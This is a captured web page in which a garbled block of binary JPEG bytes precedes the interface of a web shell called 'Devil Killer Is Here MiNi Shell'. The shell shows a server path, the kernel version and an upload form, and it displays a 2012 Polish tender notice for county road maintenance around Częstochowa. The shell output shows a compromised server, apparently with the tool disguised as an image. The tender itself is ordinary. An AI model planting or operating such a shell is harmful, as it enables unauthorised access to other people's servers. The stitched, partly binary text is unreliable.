JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120217/48120-N-2012.html

<p class="kh_header"><b>Częstochowa: Bieżące utrzymanie jezdni, chodników i pobocza dróg powiatowych oraz dróg wojewódzkich na terenie Powiatu Częstochowskiego</b><br>
<b>Numer ogłoszenia: 48120 - 2012; data zamieszczenia: 17.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Częstochowie , ul. Sobieskiego 9, 42-217 Częstochowa, woj. śląskie, tel. 034 3785467, faks 034 3785468.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzdczestochowa.4bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie jezdni, chodników i pobocza dróg powiatowych oraz dróg wojewódzkich na terenie Powiatu Częstochowskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na bieżącym utrzymaniu jezdni, chodników i pobocza dróg powiatowych o długości 577,9 km oraz dróg wojewódzkich o długości 141,1 km na terenie Powiatu Częstochowskiego w granicach gmin: Blachownia, Dąbrowa Zielona, Janów, Kamienica Polska, Kłomnice, Koniecpol. Konopiska, Kruszyna, Lelów, Mstów, Mykanów, Olsztyn, Poczesna, Przyrów, Rędziny i Starcza z podziałem na pięć zadań, tj. Zadania 1, 2, 3 w okresie od podpisania umowy do 30.11.2012 r, Zadanie 4 do 31.03.2013 r. i Zadanie 5 do 31.12.2012 r. zgodnie z podziałem na 5 zadań:

Zadanie nr 1
Remont cząstkowy nawierzchni dróg powiatowych przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 ¸ 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 ¸ 6 cm na terenie ODM 1 Rudniki w okresie od podpisania umowy do 30.11.2012 r. z podziałem na etapy:
-	I Etap obejmuje remonty cząstkowe nawierzchni dróg powiatowych po okresie zimowym wykonane do dnia 11.06.2012 r. wg bieżących potrzeb i zleceń.
-	II Etapie obejmującym okres od 12.06.2012 r. do 30.11.2012 r. wg bieżących potrzeb i zleceń, oraz usuwanie uszkodzeń zagrażających bezpieczeństwu ruchu drogowego nie później niż 24 godziny od zgłoszenia.

Zadanie nr 2
Remont cząstkowy nawierzchni dróg powiatowych i wojewódzkich przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 ¸ 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 ¸ 6 cm na terenie ODM 2 Koniecpol w okresie od podpisania umowy do 30.11.2012 r. z podziałem na etapy:
-	I Etap obejmuje remonty cząstkowe nawierzchni dróg powiatowych po okresie zimowym wykonane do dnia 11.06.2012 r. wg bieżących potrzeb i zleceń, i wojewódzkich po okresie zimowym wykonane do dnia 31.05.2012 r. wg bieżących potrzeb i zleceń.
-	II Etap obejmuje okres od 12.06.2012 r. do 30.11.2012 r. dla dróg powiatowych i od 01.06.2012 r. do 30.11.2012 r. dla dróg wojewódzkich wg bieżących potrzeb i zleceń, oraz usuwanie uszkodzeń zagrażających bezpieczeństwu ruchu drogowego nie później niż 24 godziny od zgłoszenia.

Zadanie nr 3
Remont cząstkowy nawierzchni dróg powiatowych przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 ¸ 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 ¸ 6 cm na terenie ODM 3 Poczesna w okresie od podpisania umowy do 30.11.2012 r. z podziałem na etapy:
-	I Etap obejmuje remonty cząstkowe nawierzchni dróg powiatowych po okresie zimowym wykonane do dnia 11.06.2012 r. wg bieżących potrzeb i zleceń.
-	II Etap obejmuje okres od 12.06.2012 r. do 30.11.2012 r. wg bieżących potrzeb i zleceń, oraz usuwanie uszkodzeń zagrażających bezpieczeństwu ruchu drogowego nie później niż 24 godziny od zgłoszenia.

Zadanie nr 4
Remonty cząstkowe nawierzchni dróg powiatowych i wojewódzkich mieszanką mineralno - asfaltową oraz wykonanie na drogach powiatowych i wojewódzkich dywaników z mieszanki mineralno - asfaltowej oraz innych robót utrzymaniowych w okresie od podpisania umowy do 31.03.2013 r. 
Opis: 
1.	Remont cząstkowy nawierzchni dróg powiatowych i wojewódzkich mieszanką mineralno - asfaltową będzie obejmować następujące etapy:
-	I Etap obejmuje remonty cząstkowe nawierzchni dróg po okresie zimowym wykonany 
.	na drogach powiatowych do dnia 11.06.2012 r. wg bieżących potrzeb i zleceń,
.	na drogach wojewódzkich do dnia 31.05.2012 r. wg bieżących potrzeb i zleceń.
-	II Etap obejmuje okres od 12.06.2012 r. do 31.03.2013 r. dla dróg powiatowych i od 01.06.2012 r. do 31.03.2013 r. dla dróg wojewódzkich wg bieżących potrzeb i zleceń, oraz usuwanie uszkodzeń zagrażających bezpieczeństwu ruchu drogowego nie później niż 24 godziny od zgłoszenia.
2.	Wykonanie nakładek z mieszanki mineralno - asfaltowej oraz innych robót utrzymaniowych obejmuje bieżące utrzymanie jezdni, chodników, poboczy na drogach wojewódzkich i powiatowych w okresie od podpisania umowy do dnia 31.12.2012 r. wg zleceń i zakresu robót uzgodnionego z Zamawiającym.

Zadanie nr 5
Remont i bieżące utrzymanie przepustów i odwodnienie korpusu drogowego na drogach powiatowych i wojewódzkich wg zleceń i zakresu robót uzgodnionego z Zamawiającym w okresie od podpisania umowy do dnia 31.12.2012 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium odpowiednio do zadania:
1.	Zadanie nr 1 wadium w wysokości: 5.000,00 zł. (słownie: pięć tysięcy złotych 00/100) (odpowiednio do zadania),
2.	Zadanie nr 2 wadium w wysokości: 5.000,00 zł. (słownie: pięć tysięcy złotych 00/100) (odpowiednio do zadania),
3.	Zadanie nr 3 wadium w wysokości: 4.000,00 zł. (słownie: cztery tysiące złotych 00/100) (odpowiednio do zadania),
4.	Zadanie nr 4 wadium w wysokości: 50.000,00 zł. (słownie: pięćdziesiąt tysięcy złotych 00/100) (odpowiednio do zadania),
5.	Zadanie nr 5 - wadium w wysokości: 10.000,00 zł. (słownie: dziesięć tysięcy złotych 00/100),</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają wiedzę i doświadczenie tj.: wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie roboty budowlane (drogowe), odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia zawierające się w 1 umowie, o wartości wykonanych robót nie mniejszej niż: 150.000,00 zł (brutto).
Określenie roboty budowlane odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia oznacza: wykonanie robót na drogach publicznych - bieżące utrzymanie dróg publicznych odpowiadające swoim rodzajem robotom określonym dla poszczególnych zadań.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy będą dysponować odpowiednim potencjałem technicznym o tj.: będą dysponować potencjałem technicznym - podstawowym wyposażeniem technicznym (np. remontery drogowe, koparki, walce drogowe, rozkładarka mas bitumicznych i inny sprzęt wykazany w kosztorysie ofertowym) przewidziane do użycia przy realizacji przedmiotowego zamówienia odpowiednio do zadania, tj. 
-	dla Zadań nr 1, 2 i 3 - dysponowania co najmniej 1-ym remonterem drogowym,
-	dla Zadania nr 4 - dysponowania podstawowym wyposażeniem technicznym przewidzianym do użycia przy realizacji przedmiotowego zadania tj. walce drogowe, frezarka, rozkładarka mas bitumicznych i inny sprzęt wykazany w kosztorysie ofertowym,
-	dla Zadania nr 5 - dysponowania podstawowym wyposażeniem technicznym przewidzianym do użycia przy realizacji przedmiotowego zadania tj. ścinarkę pobocza, koparkę do rowów i inny sprzęt wykazany w kosztorysie ofertowym 
W przypadku złożenia oferty na jedno, dwa lub pięć zadań Wykonawca musi dysponować powyższym sprzętem na każde z zadań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy będą dysponować odpowiednimi osobami zdolnymi do wykonania zamówienia tj.: będą dysponować osobą/-ami - kierownikiem budowy - posiadającą/-ymi uprawnienia budowlane zgodne z przedmiotem zamówienia (specjalność drogowa) lub w specjalności konstrukcyjno-budowlanej bez ograniczeń w pełnieniu obowiązków Kierownika Budowy, zgodnie z wymogiem ustawy Prawo budowlane z dnia 7 lipca 1994 r. (tekst jednolity Dz. U. Z 2006 r. Nr 156, poz. 1118 ze zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące sytuacji ekonomicznej i finansowej tj.: posiadają ubezpieczenie swojej działalności od odpowiedzialności cywilnej w wysokości min. 200.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty potwierdzające, że wymienione roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, gdy wykonawca sam nie dysponuje takim potencjałem. Oświadczenie o spełnieniu warunków udziału w postępowaniu -załącznik nr 3 do siwz</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. Warunki i zakres zmian:
-	czynniki zewnętrzne zmiana ilości i wartości rozliczeń, modyfikacje wywołane zmianami obowiązujących przepisów, zmiana terminu wykonania przedmiotu umowy, zmiana (zwiększenie) wartości przedmiotu zamówienia spowodowana dodaniem ilości zakresu robót (zależy od sytuacji finansowej zamawiającego i od zapotrzebowania wykonania robót), zmiana sprzętów na inne odpowiadające zapisom SIWZ - do czynników zewnętrznych nie wlicza się problemów z winy wykonawcy przy realizacji przedmiotu zamówienia.
-	przypadki losowe: zmiana w trakcie robót składu zespołu kierującego robotami budowlanymi, zmiana podwykonawców, dodanie podwykonawców</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzdczestochowa.4bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Częstochowie, ul. Sobieskiego 9, II piętro, pokój nr 244.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2012 godzina 09:00, miejsce: Powiatowy Zarząd Dróg w Częstochowie, ul. Sobieskiego 9, II piętro, pokój nr 241, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont cząstkowy nawierzchni dróg powiatowych przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 ¸ 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 ¸ 6 cm na terenie ODM 1 Rudniki w okresie od podpisania umowy do 30.11.2012 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont cząstkowy nawierzchni dróg powiatowych przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 ¸ 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 ¸ 6 cm na terenie ODM 1 Rudniki w okresie od podpisania umowy do 30.11.2012 r. z podziałem na etapy:
-	I Etap obejmuje remonty cząstkowe nawierzchni dróg powiatowych po okresie zimowym wykonane do dnia 11.06.2012 r. wg bieżących potrzeb i zleceń.
-	II Etapie obejmującym okres od 12.06.2012 r. do 30.11.2012 r. wg bieżących potrzeb i zleceń, oraz usuwanie uszkodzeń zagrażających bezpieczeństwu ruchu drogowego nie później niż 24 godziny od zgłoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont cząstkowy nawierzchni dróg powiatowych i wojewódzkich przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 ¸ 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 ¸ 6 cm na terenie ODM 2 Koniecpol w okresie od podpisania umowy do 30.11.2012 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont cząstkowy nawierzchni dróg powiatowych i wojewódzkich przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 ¸ 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 ¸ 6 cm na terenie ODM 2 Koniecpol w okresie od podpisania umowy do 30.11.2012 r. z podziałem na etapy:
-	I Etap obejmuje remonty cząstkowe nawierzchni dróg powiatowych po okresie zimowym wykonane do dnia 11.06.2012 r. wg bieżących potrzeb i zleceń, i wojewódzkich po okresie zimowym wykonane do dnia 31.05.2012 r. wg bieżących potrzeb i zleceń.
-	II Etap obejmuje okres od 12.06.2012 r. do 30.11.2012 r. dla dróg powiatowych i od 01.06.2012 r. do 30.11.2012 r. dla dróg wojewódzkich wg bieżących potrzeb i zleceń, oraz usuwanie uszkodzeń zagrażających bezpieczeństwu ruchu drogowego nie później niż 24 godziny od zgłoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
